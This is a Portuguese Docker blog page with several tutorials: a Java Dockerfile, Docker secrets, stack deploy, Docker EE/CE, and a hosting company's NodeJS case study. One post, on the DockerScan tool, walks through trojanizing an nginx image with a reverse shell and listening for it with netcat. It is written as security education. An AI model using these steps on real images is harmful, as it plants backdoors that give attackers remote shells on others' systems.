Java em Docker

Olá pessoas, tudo bem?

Estamos há algum tempo pensando em montar um conteúdo um pouco mais prático sobre algumas soluções e claro, dúvidas que nossos leitores tem. Pensando nisso, queremos trazer hoje algumas dicas de como você pode montar uma imagem para sua aplicação Java \o/.

Bom, antes de tudo é válido reforçar que entender um Dockerfile é fundamental para quem tem interesse na criação não só de imagens para Java, mas para qualquer linguagem ou ainda aplicação. Mas por que? Por que ele te da o poder de criar o ambiente exatamente da forma que você quer e precisa, além é claro de servir como documentação do seu ambiente, pois tudo que você precisa estará dentro do Dockerfile, então, se você ainda não leu, por favor leia o post onde explicamos melhor ele ;).

Vamos começar pequeno, um passo por vez, em nosso lab, vamos criar no diretório corrente uma pasta chamada “app”, dentro dela vamos criar o Dockerfile com o seguinte conteúdo:

FROM phusion/baseimage:0.9.17
RUN echo "deb http://archive.ubuntu.com/ubuntu trusty main universe" > /etc/apt/sources.list
RUN apt-get -y update
RUN DEBIAN_FRONTEND=noninteractive apt-get install -y -q python-software-properties software-properties-common
ENV JAVA_VER 8
ENV JAVA_HOME /usr/lib/jvm/java-8-oracle
RUN echo 'deb http://ppa.launchpad.net/webupd8team/java/ubuntu trusty main' >> /etc/apt/sources.list && \
 echo 'deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu trusty main' >> /etc/apt/sources.list && \
 apt-key adv --keyserver keyserver.ubuntu.com --recv-keys C2518248EEA14886 && \
 apt-get update && \
 echo oracle-java${JAVA_VER}-installer shared/accepted-oracle-license-v1-1 select true | sudo /usr/bin/debconf-set-selections && \
 apt-get install -y --force-yes --no-install-recommends oracle-java${JAVA_VER}-installer oracle-java${JAVA_VER}-set-default && \
 apt-get clean && \
 rm -rf /var/cache/oracle-jdk${JAVA_VER}-installer

RUN update-java-alternatives -s java-8-oracle
RUN echo "export JAVA_HOME=/usr/lib/jvm/java-8-oracle" >> ~/.bashrc
RUN apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
CMD ["/sbin/my_init"]

Explicando.

FROM – Começamos sempre a criação de uma imagem baseada em outra imagem, em nossos exemplos vamos pegar a “phusion/baseimage:0.9.17” e baseada nela montaremos todo o resto, incluindo o Java propriamente dito (lembramos que você não precisa criar tudo do zero, no Docker Hub existem imagens prontas com o SDK já instalado).

RUN – Utilizamos para executar os comandos que desejados na imagem, isso para a adição de repositório, instalação de pacotes, criação de arquivos, etc. Basicamente qualquer comando sh pode ser utilizado aqui.

ENV – Serve para definirmos algumas variáveis dentro da imagem, em nosso caso, definimos a versão do Java que queremos instalar, bem como o path “java_home” da instalação.

CMD – Comando de inicialização da imagem, aqui você define o comando que será utilizado para subir seu container e mante-lo em execução (caso seja necessário), em nosso exemplo definimos um comando fake, que não tem ação nenhuma.

Feito, precisamos buildar a imagem para posteriormente utiliza-lá, para gerar a imagem você deve executar o comando:

$ docker build -t meujava:8 .

Com isso, aparecerá na sua lista de imagens essa que você acabou de gerar, e baseada nela vamos subir uma aplicação muito simples. Então, no mesmo diretório onde você está, crie um arquivo chamado: Main.java com o seguinte conteúdo:

public class Main
{
 public static void main(String[] args) {
 System.out.println("Oi MundoDocker ;)");
 }
}

Ok, agora vamos testar a imagem, para isso basta apenas criar um container e mapear o diretório onde você está, dessa forma é possível compilar esse arquivo que acabamos de criar, veja:

$ docker run --rm -v $PWD:/app -w /app meujava:8 javac Main.java

Está pronto? Calma amiguinho, o que fizemos foi compilar nossa aplicação, veja que no mesmo diretório apareceu um novo arquivo chamado Main.java, esta é o arquivo compilado e pronto para a execução, vamos lá:

$ docker run --rm -v $PWD:/app -w /app meujava:8 java Main

Veja que o retorno será exatamente a mensagem que definimos no arquivo Main.java, sim, eu sei, é ma exemplo ridículo de simples, mas temos que começar por algo.

Sim, este é um exemplo bem simples, que serve como exemplo de como é possível executar uma aplicação Java dentro de containers Docker, é claro que essa é a base para que você mesmo possa evoluir e construir seu ambiente da forma a atender melhor a sua necessidade.

Por hoje era isso, no vemos ano que vem 😉

Grande abraço!

Entusiasta Open Source, seu principal foco é ir atrás de ideias novas e torna-las realidade através de soluções simples e eficientes, o menos é mais, e o dividir é multiplicar.

DockerScan: Análise e hacking para Docker

Olá gente! Tudo bem?

Continuando a série de textos sobre Segurança e Docker, hoje vou falar sobre uma das ferramentas que citei no texto Segurança e hacking de containers Docker,  vamos ver mais detalhes sobre a ferramenta DockerScan.

DockerScan é uma ferramentas de análise e hacking de containers Docker, com ela é possível fazer uma varredura buscando por vulnerabilidades de segurança e também fazer o inverso, injetar vulnerabilidades em imagens Docker, abaixo vamos ver suas principais funcionalidades e alguns exemplos de uso.

Principais Funcionalidades

  • Faz scan de uma rede tentando localizar os Docker Registries
  • Registry
    • Delete: Exclui image / tag remota
    • Info: Mostra informações  de registros remotos
    • Push: Envia uma imagem
    • Upload: Upload de arquivo
  • Image
    • Analyze
      • Busca por informações confidenciais em uma imagem
      • Busca por senhas em variáveis de ambiente
      • Busca por qualquer URL / IP em variáveis de ambiente
      • Tenta identificar o usuário usado para executar o software
    • Extract: extrair uma imagem
    • Info: Obtém meta-informação da imagem
    • Modify:
      • entrypoint: altere o ponto de entrada em um Docker
      • trojanize: injeta um reverse shell em uma imagem Docker
      • user: altere o usuário em execução em uma imagem Docker

Instalando o DockerScan

Vamos ver agora como é simples instalar a ferramenta DockerScan.

Primeiro instale o gerenciador de pacotes da linguagem Python o pip:

> python3.5 -m pip install -U pip

Agora instalamos o DockerScan

> python3.5 -m pip install dockerscan

Verifique se a instalação foi feita corretamente e exiba as opções de funcionamento:

> dockerscan -h

Exemplos de utilização

Agora vamos para a parte legal, por a mão na massa, vamos ver alguns exemplos de como o DockerScan pode ser utilizado:

Com o comando a baixo pode ser escaneada uma imagem para identificar possíveis vulnerabilidades:

$ dockerscan image info nome-da-imagem

Seguindos os passos a baixo podemos injetar vulnerabilidade em uma imagem Docker. Vamos adicionar um reverse shell neste exemplo:

//Baixe a imagem oficial do nginx
$ docker pull nginx

//Salve uma cópia da imagem
$ docker save nginx -o nginx-original

//Liste o conteúdo do diretório para ver se foi criada a cópia
$ ls -lh nginx-original

//Execute o seguinte comando para ver as informações da imagem
$ dockerscan image info nginx-original

//Execute um ifconfig para saber seu ip
$ ifconfig

//Execute para injetar um reverser shell
$ dockerscan image modify trojanize nginx-original -l 172.18.0.1 -p 2222 -o nginx-trojanized
//Com este comando será criada uma nova imagem com um reverse shell

//Execute em outro terminal para ficar "ouvindo" a porta 2222
$ nc -v -k -l 2222

//Faça o load da imagem com vulnerabilidade
$ docker load -i nginx-trojanized.tar

//Execute
$ docker run nginx:latest

Um reverse shell é um tipo de shell no qual a máquina alvo se comunica de volta à máquina atacante. A máquina atacante tem uma porta ouvinte na qual ele recebe a conexão, que ao usar, o código ou a execução do comando são alcançados.

Isso é tudo por enquanto, no repositório do projeto DockerScan pode ser encontrada mais informações sobre esta ferramenta, se você conhece outras dicas, ferramentas, ficou com alguma dúvida ou tem algo a contribuir, deixe um comentário abaixo. Obrigado pela leitura.

Analista de Desenvolvimento na KingHost, graduado em ADS pelo Senac. Pós-graduando em Segurança Cibernética pela UFRGS, entusiasta Open Source e Software Livre.

NodeJS com Docker na Umbler

Eai pessoal, blz?

O post hoje será um pouco diferente, queremos trazer para vocês como a Umbler desenvolveu sua plataforma de NodeJS utilizando Docker. SIM, falaremos sobre o que deu certo e, claro, o que deu errado nesse caminho. O intuito é mostrar mais um case de sucesso e tudo que foi preciso para isso :).

A Umbler  já utiliza Docker há alguns anos (obviamente para aplicações/serviços internos) e isso ajudou no desenvolvimento de sua plataforma NodeJs. Mas até chegar à experiência ideal levou tempo, pesquisa, testes, prototipação e muita paciência.

Abaixo compartilhamos com vocês uma apresentação que foi realizada durante o Meetup de NodeJS em Porto Alegre no dia 11/07, onde mostramos aos participantes os detalhes dessa jornada:

Vamos detalhar o que foi apresentado.

Quem mesmo?

A Umbler é uma StartUp gaúcha de cloud hosting sob demanda, seu objetivo é facilitar cada vez mais a vida de quem cria a web, ou seja, as agências e desenvolvedores. Atualmente possui cerca de quarenta mil clientes e conta com setenta funcionários distribuídos pelo mundo.

O caminho até aqui

Como sempre, não existe uma solução mágica para todos os problemas, ou uma única solução infalível. Às vezes, temos que nos aventurar com o máximo de alternativas possíveis para ter certeza de que aquilo não nos atenderá ou, pelo menos, não nos atenderá naquele momento.

Foi assim que, depois de muito meses de testes e prototipação, foi possível observar algumas coisas e descobrir o porquê de algumas soluções não atenderem a demanda que a Umbler queria resolver. Entre as soluções testadas é possível destacar:

OpenShift

Plataforma pronta para criação de containers, baseada em Kubernetes. É uma plataforma que funciona muito bem, tem instalação relativamente fácil, possui gerenciamento centralizado e conta com integração com diversas outras ferramentas/soluções. Esta é uma ferramenta com muitos pontos positivos, pois atende aos mais variados problemas, mas que não se encaixou, até então, no que a Umbler precisava. Dos pontos negativos que se destacam são:Curva de aprendizagem: Openshift possui, além de kubernetes, uma série de outras soluções para que seja possível a criação e gerenciamento dos containers nela hospedado. Seu uso é simples e intuitivo, mas eventualmente algo daria manutenção, e aí estava um dos empecilhos. Além de saber tudo sobre Docker, Kubernetes, OpenVswitch, era obrigatório entender cada um dos demais componentes da plataforma, justamente para se antecipar a algum problema.

  • Restrições: Apesar de todas as facilidades, o OpenShift possui algumas restrições que, para as necessidades mapeadas, impossibilitaram o seu uso ou, pelo menos, gerariam mais demanda para adaptar a plataforma. O objetivo da Umbler é criar uma plataforma completa e fácil, com a menor quantidade de amarras possíveis, garantindo assim a melhor experiência dos usuários, infelizmente o Openshift tornaria isso mais complexo de ser realizado.
  • Inovação: Obviamente inovar é preciso, no mercado de tecnologia isso é além de bom, obrigatório, com as restrições que foram encontradas inovar utilizando o Openshift dependeria muito do que a plataforma teria a oferecer,  ou seja, a inovação do produto estaria presa a inovação da plataforma, restando pouco, ou quase nada de margem para adaptação.
  • Custo: Existem basicamente duas versões do Openshift, a Origin que é opensource e você pode utilizar para resolver seus desafios sozinho, e contar com o apoio da comunidade. Ou a versão enterprise, que garante suporte comercial à plataforma e atualizações dos softwares que a compõem. Independente da versão, o custo/benefício não compensava, pois mesmo com a versão opensource o tempo de resposta ou atualização para algo crítico era muito grande, tornando assim a versão “gratuita” não tão gratuita assim.

Kubernetes

Kubernetes é um orquestrador para containers totalmente opensource, e mantido por uma comunidade gigantesca. Tendo em vista o histórico de testes/prototipação com o Openshift, a segunda abordagem naturalmente seria algo mais voltado ao que já foi visto. Como a base do Openshift é Kubernetes, a ideia era utilizar o Kubernetes e adaptar o que fosse necessário para a plataforma. Simples não? Sim e não, vamos ver algumas restrições dele:

  • Curva de aprendizagem: Realmente, utilizando apenas o Kubernetes a quantidade de tecnologias que deveriam ser dominadas foi reduzida a apenas duas: Docker e Kubernetes. Mesmo assim, o tempo para aprender tudo e saber resolver tudo dessas tecnologias era elevado. Menor do que com Openshift, mas ainda assim algo que faria a plataforma levar mais tempo a ser finalizada.
  • Restrições: Depois de muita leitura, estudo e testes, foram encontradas ainda assim algumas restrições, a mais clássica delas é o Kubernetes não suportar as últimas versões do Docker, ou seja, sempre haveria um gap entre o que foi lançado de novidade pela engine do Docker e o que realmente está sendo utilizado.
  • Inovação: Como no caso da Openshift, o uso do Kubernetes resolveria diversos pontos da plataforma, mas ainda assim seria algo que poderia travar a inovação e adaptação da plataforma.

Docker Swarm

O Swarm é o método nativo de cluster na engine do Docker, a partir da versão 1.12 do Docker é possível utilizar esse recurso sem a necessidade de uma ferramenta ou solução de terceiros. Assim como no Kubernetes, com o Swarm é possível criar e gerenciar todos os serviços/containers do cluster. Com o Swarm foi possível resolver algumas das pendências das demais soluções, como por exemplo:

  • Curva de aprendizagem: Como já mencionado, a Umbler utiliza Docker há algum tempo, então já havia em casa mesmo o conhecimento prévio, bastando apenas a adaptação para o modo de cluster.
  • Custo: Existe a versão opensource e a versão enterprise do Docker, a grande diferença entre depender da comunidade Docker e comunidade Openshift é a velocidade na resolução de alguma issue ou até mesmo melhoria para a engine, isso facilita na tomada de decisão, sem contar no tamanho das comunidades 😉
  • Inovação: Ainda há uma amarra quanto a tecnologia, no entanto, com o Swarm é possível criar/modificar a plataforma na mesma velocidade da engine de containers.

Existe algo em que o Swarm não atendeu? Sim, obviamente, e isso é natural, visto que não existe solução mágica para tudo. No entanto, foi possível adaptar algumas outras soluções para que fosse possível mitigar ou até mesmo sanar esses casos.

Sim, foi um processo longo, às vezes demorado, mas que rendeu bons frutos, seja de nível técnico (com o incremento de conhecimento para a equipe), ou de negócio, pois foi necessário o entendimento de todos quanto a necessidade real dos usuários, e, claro, a moldagem das ideias para atender essas necessidades. Desafios que foram sendo resolvidos durante a caminhada, é possível destacar:

  • Isolamento: Sim, containers são isolados, mas para isolar o tráfego entre os serviços, como faz? Esse foi um dos pontos onde se investiu algum tempo para encontrar a melhor resposta.
  • Inovar de forma responsável: A cada três meses é lançada uma nova versão do Docker, atualiza-se o ambiente a cada três meses? Usa-se as features novas já de cara? Este também foi motivo para algumas horas de conversa.
  • Complexidade: Não é porque foi utilizada uma tecnologia base que o ambiente não seria complexo. Quanto mais features para a plataforma, maior a complexidade para se atender essa demanda.
  • Simplificar: Como simplificar então? Como deixar tudo fácil de ser entendido, e, principalmente, replicável?
  • Deploy: De que forma o usuário vai utilizar a plataforma, como deve ser o melhor fluxo para colocar uma aplicação no ar com Docker? Às vezes a resposta certa não é a óbvia 😉
  • Cobrança: Como quantificar o gasto de cada cliente, existe na “caixa” isso? Quanto cobrar, e mais importante, vamos cobrar?

Além de desafios, ficaram também diversos aprendizados, que não custa nada compartilhar, certo?

  • Pesquisa e Prototipação são fundamentais. Mesmo que tu saiba tudo na teoria, ás vezes um comportamento só é validado na prática, tentando fazer dar erro.
  • Perseverança é muito importante. Às vezes a solução mais fácil parecer ser a melhor, o que pode não se confirmar. Por isso é preciso cuidado, pois você estará fazendo algo não para você, e nem para seu colega, e sim para dezenas, centenas, milhares de pessoas. É nelas que você deve pensar.
  • Ouvir todos os interessados é fundamental. Seja seu cliente (aquele que já paga pelo serviço), seja seu usuário (aquele que apenas usa, mas não gasta), seja seu colega, seu chefe, e principalmente a comunidade, apenas ouça, processe, e aí sim pense em algo que faça sentido para todos.
  • Outro ponto interessante é separar o “que” precisa ser feito do “como” deve ser feito. Em alguns casos (muitos por sinal), quando recebemos um problema para resolver já saímos com a solução pronta, montada em nossa cabeça. Mas será que o problema é realmente o apresentado? Será que essa solução se encaixa realmente na resolução? Lembre-se: O que eu preciso fazer define como eu vou fazer, e não o contrário.
  • Admita, você não terá todas as respostas em uma única solução, isso é improvável. Mas você precisará estar aberto a isso, e, principalmente, você precisará saber lidar com isso.
  • Última, mas não menos importante dica: Entenda exatamente o que você está fazendo. Não apenas aceite e saia executando. Entenda! Isso fará o seu trabalho ter mais valor e você terá outra visão daquilo que está criando.

Esperamos que isso ajude vocês durante suas próprias jornadas. Para nós foi uma experiência bem divertida, além de enriquecedora, e é uma honra compartilhar com vocês, quer conhecer mais sobre o NodeJs na Umbler? Então acessa este link, tem tudo que você precisa saber 😉

Como sempre, se ficou com dúvidas ou quer entender melhor, nos avise, e nos ajude divulgando o blog \o/. Abraço!

Entusiasta Open Source, seu principal foco é ir atrás de ideias novas e torna-las realidade através de soluções simples e eficientes, o menos é mais, e o dividir é multiplicar.

Docker EE e CE

Oi Pessoal!

No último dia 02 de março, o Docker anunciou uma grande mudança em sua plataforma, lançando oficialmente a versão enterprise da engine de containers mais utilizada atualmente. Mas o que muda? Responderemos isso e mais algumas outras dúvidas neste post!

Esse movimento adotado pelo Docker em, dividir, as versões da sua engine é algo já esperado pela comunidade, e para alguns veio até tarde. Mas por que isso agora? Por um motivo simples, produto. O Docker vem já algum tempo sendo desenvolvido como uma plataforma, agregando a cada nova release alguma correção que resolve um problema ou uma feature que melhora algum aspecto da engine.

Agora temos claro as linhas de trabalho do Docker, e como serão realizadas as atualizações na plataforma. As entregas de novas features, correção de bug, etc, seguiram a mesma linha adotada por outras empresas, ou seja, correção de bug e fix mais frequentes do que novas features, com isso a comunidade não precisará aguardar tanto tempo para ter uma correção já na engine.

Para ficar mais claro, dá uma olhada nessa imagem:

Docker Enterprise Edition

Fonte: https://blog.docker.com/2017/03/docker-enterprise-edition

Como você pode notar, as entregas para a versão community serão mais frequentes, e serão baseadas em correções e fix, tendo uma cadência mensal. Já entregas que envolvem novas features ou mudanças significativas nas engine serão realizadas a cada três meses. Já a versão enterprise terá apenas entregas trimestrais, com correções e novas features (caso tenha é claro) e o suporte será de um ano, baseado na data de lançamento.

Mas por que essa agora?

Há algum tempo estamos divulgando, ensinando e ajudando diversos públicos ao uso do Docker, tendo em vista versatilidade dessa plataforma, é claro e obvio a necessidade de adaptação do modelo de negócio para atender esses públicos, por exemplo:

Note que são perfis diversos, com necessidades e expectativas diferentes, mas em algum momento complementares. A versão enterprise do Docker visa o público que não quer apenas brincar, mas sim colocar em produção e disponibilizar para cliente.

Na imagem acima temos um apanhado geral das diferenças e onde cada versão é aplicada. Isso quer dizer que não posso colocar o Docker CE em produção? Não, isso quer dizer que se você usar a versão enterprise terá mais facilidade, já com a versão community será possível mas você terá mais trabalho.

 

Mudou o nome?

Sim, a versão community será algo parecido com isso:

# docker -v
Docker version 17.03.0-ce, build 60ccb22


Não teremos mais a nomenclatura de 1.xx, teremos então: ano.mes com a distinção entre CE e EE.

 

Tem mais alguma coisa nova?

Sim!!! Você já deve ter visto no anuncio oficial, agora há uma forma de você certificar seu ambiente seguindo as diretrizes do Docker, está disponível a Docker Store, um hub para publcação de recursos oficialmente homologados pelo Docker. Com isso, se você desejar criar um plugin para o Docker, por exemplo, você pode, atendendo uma série de requisitos, ter este plugin homologado e com certificado do Docker, o que obviamente aumenta sua relevância para quem usa.

Mas o que o Docker quer com isso? Te lembra daquelas imagens ali de cima, onde eram ilustrados os diferentes públicos que o Docker atende? Pois bem, dessa forma o Docker provê um recurso oficial, homologado e com o selo de aprovação deles para plugins, imagens, S.O, etc., atendendo assim a uma necessidade do mundo enterprise: “É confiável? Quem mantém?” dentre outras questões que este publico levanta no momento de decidir entre tecnologias.

Resumo, sim, o Docker acaba de se dividir em Community e Enterprise, até onde as coisas legais estarão na versão community só Deus sabe, mas a tendência é que sempre tenhamos  com o que brincar. E claro, para quem não quer perder tempo fazendo tudo na mão, existe a enterprise, que facilita tudo o que é possível.

Ufa, agora sim acabou 🙂

Nos ajude divulgando o blog! Grande abraço!

 

Entusiasta Open Source, seu principal foco é ir atrás de ideias novas e torna-las realidade através de soluções simples e eficientes, o menos é mais, e o dividir é multiplicar.

Docker Secrets

Oi pessoal! 

Para o artigo de hoje, contamos com a ajuda de um grande amigo nosso, o Wellington F. Silva, que colocou em seu blog um texto muito bacana sobre o que é e como funcionam as secrets no Docker 1.13. No decorrer desse post entenderemos como essa nova funcionalidade trabalha, sua origem e claro, o impacto disso em nosso dia-a-dia, #vamoslá?

 

O que é o secret?

Quando estamos trabalhando em um projeto e precisamos passar informações sensíveis para o ambiente, tais como senhas, chaves privadas, tokens, chaves de APIs e afins sempre passamos pelo problema de não podermos deixar no controle de versão e devemos sempre utilizar uma maneira segura de trafegar esses segredos.

Muitas vezes acabamos trabalhando com variáveis de ambiente para guardar essas informações, o que não é recomendado por alguns motivos.

Diogo Monica que é um dos engenheiros de software da Docker mencionou em um comentário que variáveis de ambiente quebram o princípio de “least surprise” e podem levar a eventuais vazamentos de segredos já que estão acessíveis de várias maneiras, tais como linked containers, através do *docker inspect*, de processos filhos e até de arquivos de logs já que em caso de exceptions da aplicação muitos frameworks fazem o dump do contexto, inclusive o valor das variáveis de ambiente no arquivo de log.

 

Um pouco da história

Em Janeiro de 2015 houve uma proposta de adicionar o comando `docker vault` numa alusão ao Vault Project da Hashicorp para fazer a gerencia de segredos dentro do próprio Docker. Segue o link para a issue 10310 no GitHub. A discussão evoluiu e virou a issue 13490, onde trataram do roadmap para o atual Docker Secrets.

 

Como funciona?

O Docker Secrets funciona como um cofre onde você pode colocar coisas sensíveis lá e só que tem a chave do cofre consegue utilizar, no caso essa chave é designada aos nós dos serviços que a chave for atribuída.

 

Dicas

  • Só funciona no Swarm Mode onde toda a comunicação entre os nós é por padrão encriptada.
  • Se utiliza do algoritmo de RAFT para persistir o segredo de forma encriptada por todos os nós managers e distribuir aos containers que fizerem parte do serviço ao qual a chave for atribuída.

Segue diagrama da própria Docker:

Criando um secret

Podemos criar um secret de duas maneiras, usando o STDIN:

$ echo "ConteudoDoSecret" | docker secret create um-secret -

Ou lendo um arquivo:

$ docker secret create novo-secret $HOME/senhas.txt

 

Listando, removendo e demais opções

Para listar as secrets disponíveis:

$ docker secrets ls
  ID NAME CREATED UPDATED
  8ulrzh4i1kdlxeypgh8hx5imt um-secret 3 minutes ago 3 minutes ago
  n95fprwd2trpqnjooojmpsh6z novo-secret About an hour ago About an hour ago

Demais opções do que fazer com os secrets como remover, inspecionar, etc podem ser listadas com o help:

$ docker secret --help

 

Usando o secret criado

Podemos criar um serviço usando um secret criado com o comando:

$ docker service create --name demo --secret um-secret mysql:5.7

Podemos remover um secret de algum serviço existente

$ docker service update --secret-rm um-secret demo

Ou podemos adicionar um secret a algum service que esteja de pé:

$ docker service update --secret-add novo-secret demo

 

Quando atrelamos um secret a um service podemos então acessar qualquer um dos containers que estejam rodando nesse service no path /run/secrets. Dentro do container nesse path vai existir um arquivo plain text com o nome igual ao definido no nome do secret e com o conteúdo desejado, o secret em plain text. No nosso caso seria no path /run/secrets/novo-secret.

 

Bem legal não é? Ajude divulgando o blog, e fique ligado teremos muitas novidades em breve, então se não se inscreveu em nossa newsletter, inscreva-se ;). Até a próxima.

 

Fonte: http://dumpscerebrais.com/2017/02/como-trabalhar-com-secrets-no-docker-1-13-x/

Entusiasta Open Source, seu principal foco é ir atrás de ideias novas e torna-las realidade através de soluções simples e eficientes, o menos é mais, e o dividir é multiplicar.

Docker Stack e Deploy

Oi Pessoal,

Nós já conversamos sobre o Docker 1.13 aqui, agora vamos explorar um pouco mais sobre essa funcionalidade que saiu do modo experimental e tornou-se parte da engine estável do Docker, sim estamos falando do docker stack/deploy. Mas antes, recomendo fortemente você ler este post aqui sobre docker compose v3, ele é muito, mas muito importante mesmo para os exemplos que veremos neste post.

Agora com o Docker 1.13 é possível você portar suas aplicações do compose para o Swarm, e isso graças a funcionalidade de deploy disponível na engine. Seu funcionamento é bem simples, basta você informar na execução do comando o diretório de onde está o seu arquivo compose, e o nome da aplicação, se lembra que falei que era muito importante olhar esse post? Pois bem, não adianta você ter um compose escrito para a versão 2 e tentar utilizar aqui, será necessário você se altere para as novas regras da versão 3 para que seja possível a criação de sua stack pelo docker deploy. Mas digamos que você já tem seu arquivo pronto na versão 3, vamos pegar o exemplo do outro post, basta executar:

$ docker deploy --compose-file docker-compose.yml app

O retorno desse comando será

$ docker deploy --compose-file docker-compose.yml app
Creating network app_default
Creating service app_nginx
Creating service app_redis

Dessa forma foram criados uma rede e dois serviços, o mesmos definidos no arquivo compose. Para obter mais informações da stack, você pode executar os comandos:

$ docker stack ls
NAME SERVICES
app 2

Com o stack ls, será retornado todas as stacks que você criou, neste caso retornou apenas a “app” e informa também quantos serviços existem para essa stack, com este comando:

$ docker stack ps app
ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS
xb02xrua71db app_redis.1 redis:latest node1 Running Running 7 minutes ago
lm7k8obhncyl app_nginx.1 nginx:latest node1 Running Running 7 minutes ago
jh65f9scx0cq app_nginx.2 nginx:latest node1 Running Running 7 minutes ago

Você visualizará mais informações sobre a stack, como por exemplo o id de cada container, imagem utilizada, nome do container, nó onde está executando e claro o estado de cada container. Você pode ainda, executar o comando:

$ docker stack services app
ID NAME MODE REPLICAS IMAGE
g3i4f4erympf app_nginx replicated 2/2 nginx:latest
s11w093eraxz app_redis replicated 1/1 redis:latest

Para ter a visualização de sua stack no mesmo formato dos serviços (docker service ls).

O que fizemos até aqui foi portar uma stack do docker-compose para o cluster de swarm.

 

“Ahh mas como assim?”

Bom se você pegar esse mesmo arquivo de compose e executar: docker-compose up -d, ele funcionará também, sem erro, sua stack iniciará e ficará disponível para uso, MAS, não em cluster :), você continuará utilizando o docker-compose da mesma forma que antes, sem os benefícios do Swarm. Apenas com o docker deploy é que você poderá fazer o deploy e gerenciamento de sua stack dentro do cluster de swarm.

“Ok, entendido, mas como eu escalo agora a minha stack? Antes eu executava: docker-compose scale app=3, como faço isso com o docker stack?”, não se preocupe, você continuará tendo a possibilidade de escalar a sua stack, vamos lá: Já sabemos que o docker deploy criar todos os serviços necessários para a stack, certo? Pois bem, para escalar algum componente da sua stack, basta você escalar o serviço, da mesma forma como se você estivesse manipulando um serviço dentro do swarm, veja:

$ docker service ls
ID NAME MODE REPLICAS IMAGE
cnnabnpqkjvy app_redis replicated 1/1 redis:latest
pcn4urntqn8l app_nginx replicated 2/2 nginx:latest

Agora vamos escalar o serviço de nginx da minha stack app:

$ docker service scale app_nginx=4
app_nginx scaled to 4

E o resultado é:

$ docker service ls
ID NAME MODE REPLICAS IMAGE
cnnabnpqkjvy app_redis replicated 1/1 redis:latest
pcn4urntqn8l app_nginx replicated 4/4 nginx:latest

Ou seja, escalei apenas o nginx.

 

“Ok, muito bonito, mas como eu acesso a minha stack?”

Boa pergunta, mas é claro que há uma resposta, e é aqui que vem a parte mais legal ;).

Vamos voltar ao docker-compose.yml que usamos para criar essa stack, veja essas linhas:

nginx:
    image: nginx
    ports:
        - 80:80

Preste atenção no parâmetro: ports, ali você define em qual porta o serviço vai ouvir, neste caso, o nginx estará trabalhando na porta 80, ou seja, o serviço no cluster de swarm estará disponível para acesso através da porta 80, e todos os nós do cluster, quando receberem alguma requisição na porta 80 encaminharão para o container que atende este serviço (utilizando uma das funcionalidade do docker swarm que é a rede de serviço em mesh).
Quando escalamos um serviço, dizemos ao docker para adicionar mais containers para atender as requisições que estarão sendo feitas para o mesmo, ou seja, teremos diversos containers atendendo um único recurso que é o serviço, e o swarm se encarrega de distribuir os acessos para todos os containers.

 

“Ta bom, me convenceu, mas como removo tudo agora pra fazer direito?”

Muito fácil, da mesma forma que o docker service, basta você executar:

$ docker stack rm app
Removing service app_redis
Removing service app_nginx
Removing network app_default

E serão removidos todos os serviços, containers e rede que tenham sido criadas pela sua stack.

Interessante não? Esperamos que tenha sido útil, se ficou com dúvida nos avisa que ajudamos. Por hoje era isso, nos ajude divulgando o blog e fique atento, teremos mais novidades em breve ;).

Abraço!

 

Entusiasta Open Source, seu principal foco é ir atrás de ideias novas e torna-las realidade através de soluções simples e eficientes, o menos é mais, e o dividir é multiplicar.

Oito dicas sobre Docker

Oi Gente!

Sendo este o primeiro post com conteúdo sobre Docker para o ano de 2017, tivemos a ideia de trazer a vocês algumas dicas e informações que consideramos de muita importância. Para isso fizemos um com uma apresentação sobre essas dicas, explicando cada uma dela e contando um pouco sobre como elas resolvem ou ajudam em determinadas situações. Vamos ao vídeo?

 
Para você que não conseguiu ver o vídeo, disponibilizamos também a apresentação em nosso canal no slideshare, acompanhe:

 

Viu, não deixamos passar nada 😉

Aguarde pois este ano teremos diversas novidades aqui no blog, garanto que vocês vão gostar.

 

Grande abraço!

Entusiasta Open Source, seu principal foco é ir atrás de ideias novas e torna-las realidade através de soluções simples e eficientes, o menos é mais, e o dividir é multiplicar.

Aguarde...

Inscreva-se em nossa newsletter

E fique por dentro das novidades.